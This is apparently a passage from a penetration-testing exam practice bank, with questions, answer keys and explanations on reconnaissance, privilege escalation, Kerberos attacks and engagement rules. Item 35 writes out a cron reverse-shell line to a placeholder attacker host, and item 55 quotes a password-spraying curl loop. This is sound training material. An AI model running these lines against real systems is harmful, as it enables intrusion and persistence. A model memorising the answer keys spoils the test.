The scanner likely detected the injected payload reflected in the application's response (e.g., in an error message or echoed input), which it interpreted as successful SQL execution. In custom API frameworks, input validation may reject the payload but still reflect it back in the response, causing the scanner to flag a false positive. Manual testing confirms the injection fails, so the reflection is merely a side effect of the API's error handling, not a sign of database interaction.

Exam trap

The trap here is that candidates confuse 'reflected input' (which causes false positives) with 'stored input' or actual SQL error messages, assuming any reflection indicates a vulnerability, when in fact the scanner's heuristic is flawed for custom APIs that echo back sanitized input.

How to eliminate wrong answers

Option A is wrong because a WAF blocking the payload would typically result in a different HTTP response (e.g., 403 Forbidden or a custom block page), not a false positive; the scanner would likely report the request as blocked or fail to get a response, not misinterpret a reflection. Option C is wrong because outdated signatures would more likely cause missed vulnerabilities (false negatives) rather than false positives; the issue here is the scanner's detection logic, not signature age. Option D is wrong because a generic 'Invalid input' message would actually reduce false positives, as the scanner would not see a reflection of its payload; the problem is the opposite—the API reflects the payload, which the scanner misinterprets as success.

28
MCQhard

During a vulnerability scan of a web application, a tester receives an HTTP response with a '405 Method Not Allowed' error when trying to use a PUT request. What does this indicate about the web server's configuration?

A.The server blocks the PUT method for that specific URI.
B.The PUT method is allowed but the resource does not exist.
C.The server does not support the PUT method.
D.The request was malformed and rejected.
AnswerA

The 405 (Method Not Allowed) status code specifically indicates that the requested resource exists, but the HTTP method used is not in its configured allowlist. The server's routing layer recognized the URI and rejected PUT, often because the endpoint is restricted to GET and POST. The response must include an Allow header enumerating permitted methods, so the tester should inspect that header to confirm PUT is blocked for this exact path, while it may be allowed elsewhere.

Why this answer

A 405 Method Not Allowed error indicates that the server recognized the PUT method as valid but has explicitly disallowed it for the requested URI. This is a server-level access control configuration, often enforced via web server directives (e.g., Apache's `<LimitExcept>` or IIS's request filtering) or application-level routing rules. The tester's PUT request reached the server and was processed, but the server's configuration prevented it from being fulfilled for that specific endpoint.

Exam trap

The trap here is that candidates often confuse a 405 Method Not Allowed with a 501 Not Implemented, mistakenly thinking the server lacks PUT support entirely, when in fact the server supports PUT but has been configured to deny it for that specific URI.

How to eliminate wrong answers

Option B is wrong because a 405 error is not returned when a resource does not exist; that scenario would typically produce a 404 Not Found, regardless of the HTTP method used. Option C is wrong because if the server did not support the PUT method at all, it would likely return a 501 Not Implemented error, not a 405. Option D is wrong because a malformed request would result in a 400 Bad Request error, not a 405, which is specifically about the method being disallowed for the target resource.

29
MCQmedium

A penetration tester is performing passive reconnaissance on a target organization. Which of the following tools would be BEST suited to gather information about the organization's domain names, email addresses, and subdomains from publicly available sources without directly interacting with the target's systems?

A.Nmap
B.theHarvester
C.Nessus
D.Metasploit
AnswerB

theHarvester queries public sources such as search engines, PGP key servers and certificate transparency logs to harvest domain names, email addresses and subdomains. This satisfies the passive constraint because it never sends traffic directly to the target's own systems.

Why this answer

theHarvester is specifically designed for passive reconnaissance, gathering domain names, email addresses, subdomains, and other publicly available information from search engines and public sources without directly interacting with the target's systems. It queries sources like Google, Bing, and LinkedIn, making it ideal for this task.

Exam trap

PT0-003 often tests the confusion between passive and active reconnaissance tools, where candidates might pick Nmap or Nessus thinking they are passive when they actually generate network traffic.

How to eliminate wrong answers

Option A is wrong because Nmap is an active scanning tool that sends packets to target systems to discover open ports and services, which is not passive. Option C is wrong because Nessus is a vulnerability scanner that actively probes systems for vulnerabilities, which is intrusive and not passive. Option D is wrong because Metasploit is an exploitation framework used for active attacks, not passive information gathering.

30
MCQhard

A penetration tester is finalizing a report and needs to ensure that sensitive data discovered during the test (e.g., password hashes, PII) is handled appropriately. Which of the following is the BEST practice?

A.Sanitize the data by redacting or replacing with placeholders.
B.Destroy all copies of sensitive data after the test and do not include any.
C.Present the data only in the oral debrief, not in written form.
D.Include the raw data in an encrypted appendix for the technical team.
AnswerA

Sanitization preserves the evidentiary value of the finding while removing or masking the most sensitive components, such as live credentials, PII, or PHI. Replacing real values with clearly labeled placeholders (e.g., username: <REDACTED>, token: [removed]) keeps the report useful for remediation and satisfies data minimization principles, significantly lowering the impact if the report is misplaced or intercepted.

Why this answer

Option A is correct because sanitizing sensitive findings by redacting or replacing them with placeholders (e.g., masking password hashes or PII) preserves the evidentiary value of the report while preventing unnecessary exposure of the actual secrets to readers. This aligns with penetration testing reporting best practices and data-handling standards such as those in PTES and OWASP, which call for minimizing sensitive data in deliverables. Option B is wrong because destroying all copies and omitting the data removes the evidence needed to validate and remediate the findings.

Option C is wrong because an oral-only debrief provides no durable, auditable record for remediation or compliance. Option D is wrong because including raw password hashes or PII, even encrypted, unnecessarily expands the exposure surface and violates the principle of least data in reports.

31
MCQeasy

A penetration tester runs the following command: nmap -sS -p 1-65535 -T4 -A -O --reason target. What is the primary purpose of the -A option in this command?

A.Enables OS detection, version detection, script scanning, and traceroute.
B.Sets the timing template to aggressive (level 4).
C.Enables aggressive scanning that is more likely to be detected by the target.
D.Performs a SYN (half-open) scan.
AnswerA

The -A flag in Nmap is a convenience option that aggregates several detection features: it enables operating system detection (-O), version detection (-sV), default script scanning (-sC), and traceroute (--traceroute) in a single command. Rather than specifying each flag individually, -A gives a comprehensive profile of the target's OS, services, and network path, making it a common choice for initial reconnaissance during a penetration test.

Why this answer

The -A option in nmap is a composite flag that enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute) in a single switch. This is explicitly documented in nmap's man page and is designed to provide comprehensive reconnaissance in one command, making option A correct.

Exam trap

The trap here is that candidates confuse the 'aggressive' label of -A with nmap's timing templates (e.g., -T4 or -T5), which are actually named 'aggressive' and 'insane' in the documentation, leading them to incorrectly associate -A with scan speed or detectability rather than its true composite functionality.

How to eliminate wrong answers

Option B is wrong because the -T4 flag, not -A, sets the timing template to aggressive (level 4); -A does not control timing. Option C is wrong because while -A does enable 'aggressive' scanning in the sense of combining multiple scan types, the term 'aggressive scanning' in nmap specifically refers to timing templates (e.g., -T4 or -T5), not the -A option, and -A does not inherently make the scan more detectable than other scan combinations.

32
MCQhard

During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?

A.Weak secret brute-force
B.Kid injection
C.Algorithm confusion (alg:none)
D.Key confusion
AnswerC

Algorithm confusion (alg:none) is correct because it exploits a JWT library's failure to enforce that the algorithm specified in the token's header matches a secure, expected algorithm. By setting "alg" to "none", the attacker removes the signature entirely and submits a token with only the header and payload; vulnerable servers will trust the token as if it were signed. This attack is particularly successful when the server does not explicitly block the "none" algorithm or fails to validate the token's integrity when no signature is present.

Why this answer

If the server accepts 'none' algorithm, an attacker can forge arbitrary tokens by setting alg=none and removing the signature.

33
MCQmedium

A client wants a penetration test that simulates an external threat actor with no prior access. The client provides a list of public IP ranges and domain names. Which type of test is this?

A.External black-box test.
B.Internal white-box test.
C.Gray-box test.
D.Red team exercise.
AnswerA

An external black-box penetration test is the only option that matches both constraints: the tester operates from outside the network perimeter (external) and receives no architectural diagrams, credentials, or source code (black-box). This simulates a realistic external threat actor who must rely on OSINT, port scanning, and vulnerability discovery to gain an initial foothold. The client's requirement of 'no prior access' eliminates any internal vantage point or pre-supplied knowledge, making this the correct methodology.

Why this answer

This is an external black-box test because the client provides only public IP ranges and domain names, simulating an external threat actor with no prior access. The tester has no internal knowledge or credentials, which defines a black-box approach, and the scope is limited to external-facing assets, making it external.

Exam trap

The trap here is confusing 'external' with 'black-box'—candidates may think a gray-box test is appropriate because the client provides some information, but the key is that no internal access or credentials are given, which strictly defines a black-box test.

How to eliminate wrong answers

Option B is wrong because an internal white-box test assumes the tester has full knowledge of the internal network, including credentials and architecture, which contradicts the 'no prior access' requirement. Option C is wrong because a gray-box test typically provides partial internal knowledge (e.g., credentials or network diagrams), which is not the case here as the client only gives public IP ranges and domain names.

34
Multi-Selectmedium

A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?

Select 2 answers
A.PrintSpoofer
B.Potato attacks (e.g., JuicyPotato)
C.PsExec
D.Pass-the-Hash
E.Kerberoasting
AnswersA, B

PrintSpoofer is a local privilege escalation tool that exploits SeImpersonatePrivilege by creating a malicious named pipe and tricking the Print Spooler service into connecting to it, forcing a SYSTEM token to be impersonated. Unlike JuicyPotato, it relies on the printer spooler rather than COM objects, and it works on modern Windows versions (Windows 10/Server 2016+) where older Potato variants are mitigated. This makes it a direct, reliable method to escalate from an impersonating service account to SYSTEM.

Why this answer

Option A, PrintSpoofer, is correct because it abuses the SeImpersonatePrivilege by coercing the Print Spooler service into authenticating to a controlled named pipe, then impersonating the resulting SYSTEM token to gain elevated privileges. Option B, Potato attacks such as JuicyPotato, is correct because these techniques also leverage SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) by tricking a privileged service into connecting to an attacker-controlled COM server or named pipe, allowing token impersonation to SYSTEM. Option C, PsExec, is not appropriate here because it is a remote execution/lateral movement tool that requires administrative credentials or SMB access, not a local SeImpersonatePrivilege escalation technique.

Option D, Pass-the-Hash, is incorrect because it uses captured NTLM hashes for authentication to other systems and does not exploit SeImpersonatePrivilege. Option E, Kerberoasting, is incorrect because it targets service accounts with SPNs to crack their passwords offline and is unrelated to token impersonation privilege escalation.

35
Multi-Selecthard

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

Select 3 answers
A.Adding a registry Run key
B.Creating a cron job that executes a reverse shell
C.Adding an SSH authorized_key for remote access
D.Creating a scheduled task via schtasks
E.Installing a systemd service
AnswersB, C, E

Creating a cron job that executes a reverse shell is a valid Linux persistence technique. An attacker can add an entry such as `*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'` to the user's crontab or /etc/crontab, causing a reverse shell to be re-established every five minutes if it is killed. Using `@reboot` instead ensures the cron job runs once at system startup, providing persistence across reboots. This is a reliable, operational method that only requires write access to the appropriate crontab file.

Why this answer

Cron jobs, SSH authorized_keys, and systemd services are common persistence methods on Linux. Scheduled tasks and registry Run keys are Windows-specific.

36
MCQhard

During a social engineering engagement, a tester is authorized to target employees via email phishing. However, the tester accidentally sends a phishing email to a contractor who is not listed in the personnel scope. The contractor reports the email to the client's security team, causing an internal investigation. Which of the following best describes the tester's mistake?

A.Breach of the Non-Disclosure Agreement
B.Failure to follow the Rules of Engagement
C.Mishandling of discovered criminal activity
D.Violation of the Computer Fraud and Abuse Act (CFAA)
AnswerB

The Rules of Engagement (RoE) explicitly define the authorized targets, including personnel, systems, and timeframes, and any deviation from those parameters is a scope violation. By directing phishing emails to out-of-scope individuals, the tester exceeded the documented authorization, which is precisely a failure to follow the RoE. This can invalidate the engagement's legal cover and expose the client or tester to liability.

Why this answer

Personnel scope must be clearly defined; the tester failed to adhere to the scoping requirements for social engineering.

37
MCQeasy

During a penetration test, the tester wants to identify live hosts on a network without performing a full port scan. Which Nmap command is most appropriate for this task?

A.nmap -A 192.168.1.0/24
B.nmap -O 192.168.1.0/24
C.nmap -sS 192.168.1.0/24
D.nmap -sn 192.168.1.0/24
AnswerD

The -sn switch, previously called -sP, disables port scanning and instructs Nmap to perform only host discovery, commonly known as a ping sweep. Nmap sends a mix of ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests, and any positive response marks the host as alive. This is the fastest and quietest way to enumerate responsive systems on 192.168.1.0/24 without revealing which services are open.

Why this answer

The -sn flag in Nmap performs a ping sweep (host discovery) without port scanning, sending ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests by default.

38
MCQeasy

During a penetration test, the tester wants to gather information about the target organization's domain registration and contact details without sending any traffic to the target. Which OSINT source should the tester use first?

A.Shodan
B.crt.sh
C.WHOIS
D.Censys
AnswerC

WHOIS is a standard query/response protocol, usually over TCP port 43, that retrieves the authoritative registration record for a domain from the registry and registrar databases, including registrant and administrative contacts, creation/expiration timestamps, nameservers, and registrar identity. For a penetration tester, performing a passive WHOIS lookup during the information-gathering phase is the direct way to obtain domain registration details and can yield nameservers for later DNS enumeration or contact references for social engineering. Therefore, WHOIS is the correct answer because it specifically returns the registration information requested.

Why this answer

WHOIS lookups provide registration details for domains, including administrative contacts, name servers, and expiration dates, without sending traffic to the target. Shodan searches for internet-connected devices, Censys provides certificates and host information, and crt.sh shows certificate transparency logs.

39
MCQmedium

During a penetration test, a tester discovers evidence of an ongoing live exploitation by an unknown third party. Which of the following should the tester do first?

A.Attempt to stop the exploitation on their own.
B.Continue the test and document the evidence.
C.Immediately inform the client's point of contact.
D.Ignore the finding as it is out of scope.
AnswerC

Immediately informing the client's point of contact is the mandatory first step when evidence of active exploitation is discovered during a penetration test. This triggers the client's incident response plan, enabling them to contain the threat, collect forensic evidence, and coordinate with law enforcement if necessary. The tester's responsibility is to provide accurate, timely intelligence about the observed activity, not to handle remediation independently.

Why this answer

If there is evidence of criminal activity or live exploitation, the tester should inform the client immediately so they can take appropriate action.

40
MCQmedium

Which of the following is the primary purpose of a get-out-of-jail letter in a penetration testing engagement?

A.To protect the client from legal liability
B.To document emergency contacts
C.To outline the scope of the test
D.To authorize the tester to perform testing activities and avoid prosecution
AnswerD

This letter, commonly known as a 'get-out-of-jail-free' letter, explicitly authorizes the penetration tester to perform activities that would otherwise violate computer fraud and abuse laws. It provides prima facie evidence of consent from the client, protecting the tester from criminal prosecution for unauthorized access. Without this authorization, even a legitimate security test could be deemed illegal, so the letter is the primary legal safeguard for the tester.

Why this answer

The get-out-of-jail letter provides legal authorization for the tester to perform activities that might otherwise be considered illegal, such as scanning or exploitation.

41
MCQeasy

A penetration tester has been given a target IP address and needs to quickly determine which services are running on the target. Which Nmap option should the tester use to perform a SYN scan with service version detection and default NSE scripts?

A.nmap -sS -sV -sC 192.168.1.10
B.nmap -sT -sV -sC 192.168.1.10
C.nmap -A 192.168.1.10
D.nmap -sS -O 192.168.1.10
AnswerA

Correct. SYN scan, version detection, and default scripts.

Why this answer

The -sS flag initiates a SYN stealth scan, -sV enables service version detection by probing open ports to determine application and version information, and -sC runs the default set of NSE scripts for common enumeration tasks. Together, these three options fulfill the requirement to quickly identify running services with version details and additional script-based reconnaissance, all while using a half-open TCP scan to minimize log generation.

Exam trap

The trap is that many test-takers select -A (Option C) believing it is the quickest way to meet all requirements. While -A does enable a SYN scan (when run with root privileges), version detection, and default scripts, it also activates OS detection and traceroute, which are not requested and may add unnecessary time and network activity. The question specifically asks for the combination -sS -sV -sC, which achieves only the required functions.

How to eliminate wrong answers

Option B is wrong because -sT performs a full TCP connect scan, which is slower, more detectable, and does not offer the stealth benefits of a SYN scan; it also completes the full three-way handshake, making it unsuitable for the quick, low-profile scan implied by the question. Option C is wrong because -A is an aggregate flag that enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute, which goes beyond the specific requirement of 'SYN scan with service version detection and default NSE scripts' by adding unnecessary OS detection and traceroute, and it does not explicitly specify a SYN scan (it defaults to a connect scan if run without privileges). Option D is wrong because -sS performs a SYN scan but -O enables OS detection instead of service version detection (-sV) and does not include default NSE scripts (-sC), so it fails to meet the requirement for service version detection and script execution.

42
Multi-Selectmedium

A penetration testing company is scoping a test for a client. The client wants to ensure that testing does not impact production systems. Which TWO of the following are appropriate scoping considerations? (Select TWO.)

Select 2 answers
A.Testing on a staging environment
B.Including all third-party services
C.Allowing unlimited testing hours
D.Testing all IP addresses in the organization
E.Defining specific test windows
AnswersA, E

Staging environments replicate production with controlled data and no live users, so security tests can safely simulate attacks without impacting business operations. They allow for thorough testing of vulnerabilities like injection or authentication flaws in a realistic but isolated setting. Scoping to a staging environment reduces legal and operational risks while still validating security controls effectively.

Why this answer

Option A is correct because testing on a staging environment allows the penetration testers to exercise the same application and infrastructure components without touching live production systems, directly satisfying the client's requirement that production not be impacted. Option E is correct because defining specific test windows constrains testing to agreed low-risk periods, which limits the chance that active scanning, exploitation, or traffic spikes will disrupt production services and gives the client control over when impact is possible. Option B is not appropriate because including all third-party services expands scope beyond the client's control and can affect external production systems the client does not own.

Option C is not appropriate because allowing unlimited testing hours removes the scheduling control needed to protect production during peak or business-critical times. Option D is not appropriate because testing all IP addresses in the organization would include production hosts, contradicting the goal of avoiding production impact.

Exam trap

The trap here is that candidates may confuse 'defining specific test windows' with a scheduling detail rather than a scoping control, but it directly prevents testing during production peak hours, thus protecting production systems from impact.

43
MCQhard

During a penetration test, the tester runs a DNS zone transfer attempt against a target domain. The zone transfer fails. What is the most likely reason?

A.The DNS server is configured to deny zone transfers from unauthorized hosts
B.The DNS server is offline
C.The tester used the wrong tool
D.The domain does not exist
AnswerA

Zone transfers use the AXFR query type to replicate an entire DNS zone. The server's allow-transfer ACL determines which IP addresses may request a full zone copy; when the tester's source IP is not in that list, the server typically responds with a REFUSED or 'Transfer failed' error while still answering normal recursive/authoritative queries, so the attempt appears blocked.

Why this answer

DNS zone transfers are typically restricted by default to authorized secondary DNS servers only. Misconfigured DNS servers might allow zone transfers from any host, but it's uncommon. The failure is likely due to security restrictions.

The authoritative server is not necessarily offline, and the domain might not exist otherwise.

44
MCQeasy

A penetration tester is hired to perform a security assessment of a small business. The business has a single website hosted on a shared server, and the tester wants to identify the content management system (CMS) and plugins used without sending any traffic that might alert the hosting provider. The tester has no previous knowledge of the website. Which of the following techniques would be BEST for this task?

A.Perform a full TCP port scan with nmap on the server's IP
B.Use the Wayback Machine to view cached historical pages
C.Use the 'view page source' feature after browsing the site normally
D.Submit the website URL to a vulnerability scanner like OpenVAS
AnswerB

The Wayback Machine serves archived copies from its own infrastructure, so the tester retrieves historical HTML, headers and asset paths revealing CMS fingerprints and plugin directories without any packets reaching the target host, satisfying the no-alert constraint.

Why this answer

The correct answer is B: using the Wayback Machine to view cached historical pages. This is a passive reconnaissance technique that retrieves archived copies of the site from the Internet Archive's servers, so no traffic is sent to the target or its hosting provider, satisfying the requirement to avoid alerting anyone. It can reveal CMS fingerprints and plugin paths preserved in older snapshots even without prior knowledge of the site.

Option A is wrong because an nmap TCP port scan sends packets directly to the target host and is active reconnaissance that could be logged. Option C is wrong because browsing the live site and viewing source generates direct requests to the shared server, which the hosting provider can observe. Option D is wrong because submitting the URL to OpenVAS causes the scanner to actively probe the target, generating detectable traffic.

45
MCQeasy

A penetration tester has gained administrative access to a Windows system and wants to extract NTLM password hashes from the memory of the Local Security Authority Subsystem Service (LSASS). Which tool is most commonly used for this purpose?

A.John the Ripper
B.Mimikatz
C.Hashcat
D.Netcat
AnswerB

Mimikatz is a specialized post-exploitation tool built for credential extraction from Windows systems, famously accessing LSASS.exe process memory where Windows caches logon credentials to support single sign-on. With administrative privileges, commands like `sekurlsa::logonpasswords` can parse LSASS memory to recover cleartext passwords, NTLM hashes, Kerberos tickets, and PINs. This direct memory-extraction capability makes Mimikatz the correct tool for the scenario described.

Why this answer

Mimikatz is the most commonly used tool for extracting NTLM password hashes from LSASS memory on a Windows system. It leverages the `sekurlsa::logonpasswords` module to read the LSASS process memory and decrypt stored credentials, including NTLM hashes, without requiring a separate brute-force or dictionary attack.

Exam trap

The trap here is that candidates confuse hash extraction tools (Mimikatz) with hash cracking tools (John the Ripper, Hashcat), assuming any tool that works with hashes can also extract them from memory.

How to eliminate wrong answers

Option A is wrong because John the Ripper is a password cracking tool that operates on already-extracted hash files (e.g., NTLM hashes saved to a file), not a tool for extracting hashes from LSASS memory. Option C is wrong because Hashcat is a GPU-accelerated password recovery tool that cracks hashes from a provided hash list, but it cannot directly access or extract hashes from a running Windows process like LSASS.

46
MCQhard

A penetration tester is performing internal reconnaissance on a network that uses IPv6. The tester wants to discover alive hosts and their IPv6 addresses without sending many packets. Which technique is most effective for this purpose?

A.Perform a full TCP SYN scan on the entire /64 subnet using Nmap with IPv6 addressing
B.Ping the IPv6 all-nodes multicast address (ff02::1) and analyze the responses to discover active hosts
C.Request the DHCPv6 server log from the network administrator to obtain a list of assigned IPv6 addresses
D.Use the `ip neighbor` command on the tester's machine to view the IPv6 neighbor cache after generating traffic
AnswerB

Sending an ICMPv6 echo request to the link-local all-nodes multicast address ff02::1 is an efficient active discovery method because every IPv6 host must join the ff02::1 group on its interface. When a host receives the multicast ping, it replies with its link-local address, allowing the tester to quickly enumerate active nodes on the segment. This technique is analogous to IPv4 broadcast ping but is more precise in IPv6, though some firewalls may suppress echo replies, and the results are limited to the local link.

Why this answer

Sending a ping to the IPv6 all-nodes multicast address (ff02::1) triggers a response from all active hosts on the local link that have IPv6 enabled, allowing the tester to discover alive hosts and their IPv6 addresses with minimal packets. This technique leverages the inherent multicast behavior of IPv6, where hosts join the all-nodes multicast group by default, making it highly efficient for reconnaissance without scanning each address individually.

Exam trap

The trap here is that candidates may overlook the efficiency of multicast-based discovery and instead choose a brute-force scan (Option A), not realizing that IPv6 subnets are far too large for exhaustive scanning, or they may mistakenly think DHCPv6 logs (Option C) are always available or reliable in IPv6 environments where SLAAC is common.

How to eliminate wrong answers

Option A is wrong because performing a full TCP SYN scan on an entire /64 subnet (2^64 addresses) is impractical and would generate an enormous number of packets, defeating the goal of discovering hosts without sending many packets; it is also inefficient and likely to be detected or blocked. Option C is wrong because requesting the DHCPv6 server log from the network administrator relies on human cooperation and may not be feasible during a penetration test, and it does not involve the tester actively discovering hosts; additionally, many IPv6 networks use stateless address autoconfiguration (SLAAC) rather than DHCPv6, so the log may not contain all active addresses.

47
MCQmedium

During a penetration test, you want to perform a stealthy port scan that minimizes the chance of being logged by the target. Which Nmap option should you use?

A.-sU
B.-sV
C.-sT
D.-sS
AnswerD

The -sS TCP SYN half-open scan sends a SYN, reads the SYN-ACK, then tears down with RST before the connection completes. Because no session is established, most application and host logging never records it, satisfying the stem's stealth requirement.

Why this answer

The -sS option performs a TCP SYN scan (half-open scan), which sends SYN packets and never completes the TCP handshake. Because the connection is never fully established, the target's application layer never logs the connection, making it the stealthiest common scan type. It requires raw socket privileges (root/admin) but is the default scan type when Nmap is run with elevated privileges.

Exam trap

PT0-003 often tests the misconception that any scan without a full handshake is undetectable; candidates may pick -sT thinking it is stealthy because it is the default for unprivileged users, but it is actually the most logged scan type.

How to eliminate wrong answers

Option A is wrong because -sU performs UDP scanning, which is slow, often unreliable due to ICMP rate limiting, and not inherently stealthy — it can trigger ICMP port-unreachable responses that are logged. Option B is wrong because -sV enables version detection, which actively probes services with additional packets and increases the scan's footprint, making it less stealthy. Option C is wrong because -sT performs a full TCP connect scan using the OS's connect() system call, which completes the three-way handshake and is easily logged by the target application and IDS.

48
MCQmedium

You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?

A.AS-REP roasting
B.LLMNR poisoning
C.Pass-the-Ticket
D.Kerberoasting
AnswerD

Kerberoasting is the correct technique because it targets service accounts by requesting TGS tickets for SPNs. The TGS ticket includes an encrypted segment that is encrypted with the service account's NTLM hash, allowing an attacker to extract these tickets and crack them offline using dictionary or brute-force attacks to recover the plaintext password. This directly aligns with the scenario of capturing a Kerberos ticket for offline cracking.

Why this answer

Kerberoasting involves requesting TGS tickets and cracking them offline to recover service account passwords.

49
MCQmedium

During code review, a penetration tester identifies the following line in a PHP web application: $sql = "SELECT * FROM users WHERE username='" . $_GET['user'] . "'"; Which type of vulnerability is most likely present?

A.SQL injection
B.Insecure deserialization
C.Command injection
D.Cross-site scripting (XSS)
AnswerA

The $_GET['user'] value is concatenated directly into the SQL string without parameterisation or escaping, so an attacker can inject SQL syntax through the user parameter. This is classic SQL injection, allowing query manipulation or data exfiltration.

Why this answer

Direct concatenation of user input into an SQL query without sanitization results in SQL injection vulnerability.

50
MCQeasy

During a penetration test, the tester discovers a critical vulnerability that could lead to a data breach. The tester needs to communicate this to the client's management, who are non-technical. What is the BEST way to communicate this finding?

A.Include the finding only in the final report
B.High-level summary with business impact and recommended timeline for fix
C.Email with subject 'URGENT' and no further details
D.Detailed technical exploit steps
AnswerB

Non-technical management need business risk framing, not exploit detail. A high-level summary stating business impact plus a recommended remediation timeline conveys severity and urgency in terms they can act on, satisfying the stem's non-technical audience constraint.

Why this answer

Option B is correct because communicating a critical vulnerability to non-technical management requires translating the technical finding into business terms, so a high-level summary that states the business impact (e.g., potential data breach, regulatory exposure, financial loss) plus a recommended remediation timeline gives executives what they need to prioritize and authorize action. This approach aligns with standard penetration-test reporting practices such as those in PTES, where executive summaries convey risk and urgency without technical jargon. Option A fails because burying a critical finding only in the final report delays awareness and response.

Option C is inadequate because an 'URGENT' email with no details provides no context for decision-making. Option D is inappropriate for a non-technical audience since detailed exploit steps belong in the technical section of the report, not in management communication.

51
MCQmedium

A client requests a penetration test for a new e-commerce application. The application uses a microservices architecture with RESTful APIs and a React frontend. The tester recommends including both a vulnerability assessment and manual penetration testing. However, the client has a tight budget and asks to skip the vulnerability assessment to save costs. Which response best aligns with best practices?

A.Perform only a vulnerability assessment because it covers more vulnerabilities.
B.Use automated scanning tools during the manual penetration test to compensate.
C.Agree to skip the vulnerability assessment and focus only on manual penetration testing.
D.Conduct a vulnerability assessment first and then manually validate findings.
AnswerD

Conducting a vulnerability assessment first and then manually validating each finding is the industry-standard approach (e.g., PTES and NIST SP 800-115). The scanner provides broad coverage of known vulnerabilities, while manual testing eliminates false positives, tests for exploitability, and uncovers the business logic and chaining issues that automated tools cannot detect. This combination lets the tester produce a prioritized, risk-based report that meets the client's penetration testing objective, rather than just a list of potential flaws.

Why this answer

Best practices recommend a vulnerability assessment to identify potential weaknesses, followed by manual validation to reduce false positives and exploit critical issues. Skipping the assessment may leave critical vulnerabilities undetected.

52
MCQmedium

During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?

A.Mimikatz
B.Windows-Exploit-Suggester
C.PrintSpoofer
D.PowerUp
AnswerC

PrintSpoofer is the correct choice because it directly abuses SeImpersonatePrivilege by creating a named pipe and then coercing a SYSTEM-level process, typically the print spooler, to connect to it. Once the connection occurs, the tool impersonates the SYSTEM token from the named pipe connection, allowing the attacker to spawn a new process as SYSTEM. This is a textbook token impersonation attack, not a kernel exploit, making it the precise tool for the described privilege escalation attempt.

Why this answer

PrintSpoofer is a tool that exploits SeImpersonatePrivilege to impersonate SYSTEM tokens.

53
MCQmedium

During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?

A.ntlmrelayx
B.Hashcat
C.Responder
D.Bettercap
AnswerC

Responder is a purpose-built tool for LLMNR, NBT-NS, and mDNS poisoning. It listens for broadcast name resolution requests and answers them, causing clients to send their NTLMv1/v2 authentication challenges to the attacker's machine. By doing so, it directly captures the NTLM hashes from the challenge-response handshake, making it the correct tool for this task.

Why this answer

Responder is the standard tool for LLMNR/NBT-NS/mDNS poisoning to capture NTLM hashes.

54
MCQmedium

During a penetration test, you need to gather information about a target's email addresses and employee names without directly interacting with the target's systems. Which tool is most appropriate for this passive reconnaissance task?

A.Shodan
B.Censys
C.Maltego
D.theHarvester
AnswerD

theHarvester is the correct answer because it is a dedicated OSINT tool engineered to passively gather emails, subdomains, hostnames, and employee names from public sources. It queries search engines like Bing and Google, PGP key servers, and other open data repositories, making it ideal for the early reconnaissance phase of a penetration test. Its specific focus on email harvesting and subdomain enumeration aligns precisely with the task of gathering information about an organization's digital footprint, unlike general-purpose scanners or link-analysis platforms.

Why this answer

theHarvester is an OSINT tool designed to gather emails, subdomains, IPs, and employee names from public sources like search engines and social media. Maltego is more for relationship mapping, Shodan for internet-facing devices, and Censys for certificate and network data.

55
MCQhard

A penetration tester is analyzing a Bash script that automates a password spraying attack. The script contains the following loop: 'for user in $(cat users.txt); do for pass in $(cat passwords.txt); do curl -s -o /dev/null -w "%{http_code}" --data "user=$user&pass=$pass" http://target/login; done; done'. The script runs but the output is a continuous stream of HTTP status codes that are hard to interpret. Which improvement would most effectively help the tester identify a successful login?

A.Add a delay with 'sleep 1' between requests to avoid rate limiting.
B.Pipe the output to 'grep -v 200' to exclude any responses that are not 200 OK.
C.Add a conditional statement that checks if the HTTP status code is 302 (redirect) or 200, and if so, prints the successful credentials.
D.Use 'curl -v' to see the full response headers.
AnswerC

Adding a conditional in the bash script to check for HTTP 302 or 200 and then printing the credentials directly automates the success detection. In web applications, a login form often responds with a 302 redirect to the authenticated user's dashboard upon success, or 200 with the post-login page; unsuccessful attempts typically return 401, 403, or 200 with an error message in the body. By capturing the status code with curl -w '%{http_code}' and comparing it in an if statement, the script can immediately isolate valid credential pairs from the noise, turning raw output into actionable findings.

Why this answer

The script currently outputs a raw stream of HTTP status codes with no context. Adding a conditional to check for 302 (redirect, often indicating a successful login) or 200 (OK) and printing the corresponding credentials allows the tester to immediately identify which user/password pair succeeded, turning an unreadable output into actionable intelligence.

Exam trap

The trap here is that candidates assume filtering out 200 codes (Option B) will reveal successes, but they overlook that many real-world login flows use a 302 redirect for success, making 'grep -v 200' ineffective or misleading.

How to eliminate wrong answers

Option A is wrong because adding a delay with 'sleep 1' would only slow down the attack to avoid rate limiting or detection; it does not help interpret the output stream of status codes. Option B is wrong because piping to 'grep -v 200' would exclude 200 responses, but a successful login might return a 302 redirect (common in web apps) or even a 200; filtering out 200 could miss successes and still leave other codes (e.g., 401, 403) in the output, failing to clearly identify the successful credentials.

56
MCQmedium

During the pre-engagement phase, a penetration tester and the client agree on the specific IP ranges to be tested, testing windows, and what constitutes an emergency stop condition. Which document typically contains these details?

A.Non-Disclosure Agreement (NDA)
B.Get-out-of-jail letter
C.Rules of Engagement (RoE)
D.Statement of Work (SOW)
AnswerC

The Rules of Engagement document records the agreed scope, IP ranges, testing windows and emergency stop conditions between tester and client. It satisfies the pre-engagement requirement by formalising these authorisation and boundary details before testing begins, distinct from the statement of work or NDA.

Why this answer

